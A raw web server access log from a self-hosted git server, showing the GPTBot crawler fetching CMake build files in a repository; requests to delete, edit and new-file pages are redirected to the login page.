"https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt" -[17/Feb/2026:18:47:05 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache" -[17/Feb/2026:18:47:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache" -[17/Feb/2026:18:47:06 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml" -[17/Feb/2026:18:47:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml" -[17/Feb/2026:18:47:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/C++Project/TestProject/build/CMakeFiles/CMakeDirectoryInformation.cmake" [Client 74.7.227.38] [Length 672] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/CMakeDirectoryInformation.cmake" -[17/Feb/2026:18:47:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/C++Project/TestProject/build/CMakeFiles/CMakeDirectoryInformation.cmake" [Client 74.7.227.38] [Length 967] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/CMakeDirectoryInformation.cmake" -[17/Feb/2026:18:47:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/C++Project/industrial-comm/build/CMakeFiles/CMakeDirectoryInformation.cmake" [Client 74.7.227.38] [Length 696] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/CMakeFiles/CMakeDirectoryInformation.cmake" -[17/Feb/2026:18:47:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/branch/main/C++Project/TestProject/build/CMakeFiles/CMakeDirectoryInformation.cmake" [Client 74.7.227.38] [Length 11298] [Gzip 3.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/CMakeDirectoryInformation.cmake" -[17/Feb/2026:18:47:08 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/C++Project/industrial-comm/build/CMakeFiles/CMakeDirectoryInformation.cmake" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/CMakeFiles/CMakeDirectoryInformation.cmake" -[17/Feb/2026:18:47:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/C++Project/industrial-comm/build/CMakeFiles/CMakeDirectoryInformation.cmake" -[17/Feb/2026:18:47:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/C++Project/industrial-comm/build/CMakeFiles/CMakeDirectoryInformation.cmake" [Client 74.7.227.38] [Length 1059] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/CMakeFiles/CMakeDirectoryInformation.cmake" -[17/Feb/2026:18:47:09 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCCompiler.cmake" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCCompiler.cmake" -[17/Feb/2026:18:47:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCCompiler.cmake" -[17/Feb/2026:18:47:10 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCCompiler.cmake" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCCompiler.cmake" -[17/Feb/2026:18:47:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCCompiler.cmake" -[17/Feb/2026:18:47:10 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/C++Project/TestProject/build/CMakeFiles/CMakeDirectoryInformation.cmake" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/CMakeDirectoryInformation.cmake" -[17/Feb/2026:18:47:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/C++Project/TestProject/build/CMakeFiles/CMakeDirectoryInformation.cmake" -[17/Feb/2026:18:47:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/branch/main/C++Project/industrial-comm/build/CMakeFiles/progress.marks" [Client 74.7.227.38] [Length 10342] [Gzip 2.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/CMakeFiles/progress.marks" -[17/Feb/2026:18:47:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache" [Client 74.7.227.38] [Length 85] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache" -[17/Feb/2026:18:47:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/branch/main/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache" [Client 74.7.227.38] [Length 10358] [Gzip 2.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache" -[17/Feb/2026:18:47:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache" [Client 74.7.227.38] [Length 947] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache" -[17/Feb/2026:18:47:13 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt" -[17/Feb/2026:18:47:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt" -[17/Feb/2026:18:47:13 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/C++Project/TestProject/build/CMakeFiles/CMakeDirectoryInformation.cmake" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/C++Project/TestProject/build/CMakeFiles/CMakeDirectoryInformation.cmake" -[17/Feb/2026:18:47:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/C++Project/TestProject/build/CMakeFiles/CMakeDirectoryInformation.cmake" -[17/Feb/2026:18:47:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/C++Project/industrial-comm/build/CMakeFiles/progress.marks" [Client 74.7.227.38] [Length 1025] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/CMakeFiles/progress.marks" -[17/Feb/2026:18:47:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/C++Project/industrial-comm/build/CMakeFiles/progress.marks" [Client 74.7.227.38] [Length 2] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/CMakeFiles/progress.marks" -[17/Feb/2026:18:47:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/C++Project/industrial-comm/build/CMakeFiles/Makefile.cmake" [Client 74.7.227.38] [Length 1025] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/CMakeFiles/Makefile.cmake" -[17/Feb/2026:18:47:16 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/C++Project/industrial-comm/build/CMakeFiles/Makefile.cmake" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/C++Project/industrial-comm/build/CMakeFiles/Makefile.cmake" -[17/Feb/2026:18:47:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/C++Project/industrial-comm/build/CMakeFiles/Makefile.cmake" -[17/Feb/2026:18:47:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/C++Project/industrial-comm/build/CMakeFiles/Makefile.cmake" [Client 74.7.227.38] [Length 6458] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/CMakeFiles/Makefile.cmake" -[17/Feb/2026:18:47:17 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/a.out" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/a.out" -[17/Feb/2026:18:47:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/a.out" -[17/Feb/2026:18:47:17 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml" -[17/Feb/2026:18:47:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml" -[17/Feb/2026:18:47:18 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache" -[17/Feb/2026:18:47:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache" -[17/Feb/2026:18:47:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/C++Project/industrial-comm/build/CMakeFiles/progress.marks" [Client 74.7.227.38] [Length 9898] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/CMakeFiles/progress.marks" -[17/Feb/2026:18:47:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/C++Project/industrial-comm/build/CMakeFiles/Makefile.cmake" [Client 74.7.227.38] [Length 9883] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/CMakeFiles/Makefile.cmake" -[17/Feb/2026:18:47:19 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt" -[17/Feb/2026:18:47:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt" -[17/Feb/2026:18:47:20 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/C++Project/industrial-comm/build/CMakeFiles/progress.marks" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/C++Project/industrial-comm/build/CMakeFiles/progress.marks" -[17/Feb/2026:18:47:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/C++Project/industrial-comm/build/CMakeFiles/progress.marks" -[17/Feb/2026:18:47:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/branch/main/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt" [Client 74.7.227.38] [Length 10445] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt" -[17/Feb/2026:18:47:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt" [Client 74.7.227.38] [Length 1515] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt" -[17/Feb/2026:18:47:22 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt" -[17/Feb/2026:18:47:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt" -[17/Feb/2026:18:47:22 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/C++Project/TestProject/build/CMakeFiles/CMakeDirectoryInformation.cmake" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/CMakeDirectoryInformation.cmake" -[17/Feb/2026:18:47:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/C++Project/TestProject/build/CMakeFiles/CMakeDirectoryInformation.cmake" -[17/Feb/2026:18:47:23 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/C++Project/TestProject/build/CMakeFiles/CMakeDirectoryInformation.cmake" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/C++Project/TestProject/build/CMakeFiles/CMakeDirectoryInformation.cmake" -[17/Feb/2026:18:47:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/C++Project/TestProject/build/CMakeFiles/CMakeDirectoryInformation.cmake" -[17/Feb/2026:18:47:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt" [Client 74.7.227.38] [Length 467] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt" -[17/Feb/2026:18:47:24 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt" -[17/Feb/2026:18:47:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt" -[17/Feb/2026:18:47:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/flags.make" [Client 74.7.227.38] [Length 11709] [Gzip 3.21] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir" -[17/Feb/2026:18:47:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake" [Client 74.7.227.38] [Length 12221] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir" -[17/Feb/2026:18:47:25 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/C++Project/industrial-comm/build/CMakeFiles/Makefile.cmake" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/C++Project/industrial-comm/build/CMakeFiles/Makefile.cmake" -[17/Feb/2026:18:47:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/C++Project/industrial-comm/build/CMakeFiles/Makefile.cmake" -[17/Feb/2026:18:47:26 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/C++Project/industrial-comm/build/CMakeFiles/progress.marks" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; 